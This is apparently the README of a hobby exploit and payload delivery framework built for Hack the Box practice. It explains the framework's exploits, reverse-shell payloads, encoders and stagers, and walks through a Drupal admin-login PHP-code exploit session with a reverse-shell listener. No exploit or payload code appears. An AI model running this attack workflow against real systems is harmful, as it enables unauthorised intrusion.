# Sploit - Exploit/Payload Delivery Framework

This framework is likely a reinvention of the wheel. Metasploit would be the analagous, more robust tool for this same purpose. I built this framework for fun, so I could use it to "get to the point" when scripting exploits for things like Hack the Box where I didn't want to use Metasploit, but also didn't want to have to rewrite the repetative portions of exploits.

## Structure of the framework

This framework is divided into 4 different large pieces:

1. Exploits
	- This is the attacker-side code that actually takes advantage of a security flaw to inject a payload into a vulnerable service.
2. Payloads
	- Payloads are the things that get sent to a vulnerable machine via an exploit.
	- They execute a specific action (normally, a reverse or bind shell or other C2 framework)
3. Encoders
	- Encoders wrap payloads in different ways (for example, base64, obfuscated shellcode, etc).
4. Stagers
	- Stagers take a payload with one target, and create a stager for another target.
	- For example, a stager may encode a linux shellcode targeted payload, and stage it using shell commands in a file, and executing it on the remote machine. This allows an exploit targeting, say, PHP code to deploy a linux shellcode payload.

## Using existing exploits and payloads

Sploit is a generic framework. Exploits don't inherantly know what payloads to use, and payloads don't necessarily know where to connect or what to do. These types of options are set in a JSON configuration file (by default named `config.json`). By design, I expect this framework to be stored in a common directory, and called from a different place. It will recognize when it is called from outside the `sploit` directory, and adjust paths appropriately. As an example, my attacking machine has the following setup:

```
Home Directory:
- tools
	- sploit
		- sploit.py
		- exploits
		- payloads
- targets
	- target0
		- config.json
	- target1
		- config.json
		- target1.py
	- target2.json
```

In order to exploit `target0`, you would first enter the `~/targets/target0` directory, and then execute the `sploit.py` script, which will open the local `config.json` configuration file, and pull exploits and payloads from the standard `sploit/exploits` and `sploit/payloads` directories. A normal `config.json` for `target0` may look like:

```json
{
	"rhost": "10.0.0.20",
	"rport": 80,
	"payload": "payloads.generic.php_reverse_shell",
	"exploit": "exploits.drupal.php_code",
	"shell": "/bin/sh",
	"user": "admin",
	"password": "password"
}
```

This tells `sploit.py` that we want to attack a target at `10.0.0.20:80` using the Drupal PHP Code plugin, and to deploy a generic PHP Reverse Shell. We also have exploit specific parameters `user` and `password`, which in this case are administrator credentials to the Drupal server. The only missing parameters at this point are the local host. We can specify the local host address in two different ways. First, we can specify the local host using the `interface` argument, which is the name of an interface we want to use. `sploit.py` will look up the interface IP address, and us that as the local address. Another way, is to specify the `lhost` argument in order to manually specify an IP address to listen on/connect to. We can specify these arguments in `config.json`, however since they often change, I normally specify them on the command line. Any arguments specified in the configuration file can be overriden by the command line arguments. An example of a session may be:

```bash
root@kali:~/targets/target0# cat config.json
{
	"rhost": "10.0.0.20",
	"rport": 80,
	"payload": "payloads.generic.php_reverse_shell",
	"exploit": "exploits.drupal.php_code",
	"shell": "/bin/sh",
	"user": "admin",
	"password": "password"
}
root@kali:~/targets/target0# ../../sploit.py --help
usage: sploit.py [-h] [--config CONFIG] [--exploit EXPLOIT]
                 [--payload PAYLOAD] [--encoder ENCODER] [--proxy PROXY]
                 [--rhost RHOST] [--rport RPORT] [--user USER]
                 [--password PASSWORD] [--interface INTERFACE] [--lhost LHOST]
                 [--lport LPORT] [--shell SHELL]

Log-in to Drupal as an Administrator using known credentials, enable PHP code
inclusion within Articles, and use this to execute arbitrary code on the
server as the Drupal user.

optional arguments:
  -h, --help            show this help message and exit
  --config CONFIG, -c CONFIG
                        Exploit configuration file
  --exploit EXPLOIT, -e EXPLOIT
                        Exploit selection
  --payload PAYLOAD, -p PAYLOAD
                        Payload selection
  --encoder ENCODER, -enc ENCODER
                        Encoder selection
  --proxy PROXY         Proxy host:port
  --rhost RHOST         Remote Host (target) address
  --rport RPORT         Remote Port
  --user USER           Drupal admin user name
  --password PASSWORD   Drupal admin user password
  --interface INTERFACE
                        Interface name to find local host address
  --lhost LHOST         Local Host (attacker) address
  --lport LPORT         Local Port
  --shell SHELL         the shell to execute
root@kali:~/targets/target0# ../../sploit.py --interface tun0
[*] setting up payload
[+] Trying to bind to 10.10.14.10 on port 43166: Done
[∧] Waiting for connections on 10.10.14.10:43166
[*] executing exploit
[*] logging into drupal as admin:password
[*] exploit started, initiating session
```

In this case, the given machine is fictional, so the exploit was not successful. On a related note, you do not need separate directories. For simple targets, you may only have the configuration file. This can be seen in the directory listing above. You may want to run the exploit on `target2`. This would be done by:

```bash
root@kali:~/targets# ../sploit.py --config target2.json --interface tun0 --help
usage: sploit.py [-h] [--config CONFIG] [--exploit EXPLOIT]
                 [--payload PAYLOAD] [--encoder ENCODER] [--proxy PROXY]
                 [--rhost RHOST] [--rport RPORT] [--user USER]
                 [--password PASSWORD] [--interface INTERFACE] [--lhost LHOST]
                 [--lport LPORT] [--shell SHELL]

Log-in to Drupal as an Administrator using known credentials, enable PHP code
inclusion within Articles, and use this to execute arbitrary code on the
server as the Drupal user.

optional arguments:
  -h, --help            show this help message and exit
  --config CONFIG, -c CONFIG
                        Exploit configuration file
  --exploit EXPLOIT, -e EXPLOIT
                        Exploit selection
  --payload PAYLOAD, -p PAYLOAD
                        Payload selection
  --encoder ENCODER, -enc ENCODER
                        Encoder selection
  --proxy PROXY         Proxy host:port
  --rhost RHOST         Remote Host (target) address
  --rport RPORT         Remote Port
  --user USER           Drupal admin user name
  --password PASSWORD   Drupal admin user password
  --interface INTERFACE
                        Interface name to find local host address
  --lhost LHOST         Local Host (attacker) address
  --lport LPORT         Local Port
  --shell SHELL         the shell to execute
```

## Using Custom Target Exploits, Payloads or Encoders

If you find that a target has a new vulnerability or target-specific vulnerability, you can still use the framework to handle all argument parsing, and payload creation by creating a custom exploit in the current directory. The names of payloads, exploits, and encoders are all simply python fully qualified package names. In the example above, `target1` may have a `config.json` like:

```json
{
	"rhost": "10.0.0.21",
	"rport": 813,
	"payload": "target1",
	"exploit": "target1",
	"encoder": "target1",
	"shell": "/bin/sh"
}
```

This simple configuration file specifies an exploit package named `target1`. `sploit.py` will find the `target1.py`	source file in the `target1` directory, and look for `Exploit`, `Payload`, and `Encoder` classes within it. For information on how to write custom exploits, please see the appropriate rREADME (e.g. [exploits documentation](./exploits/README.md)).
















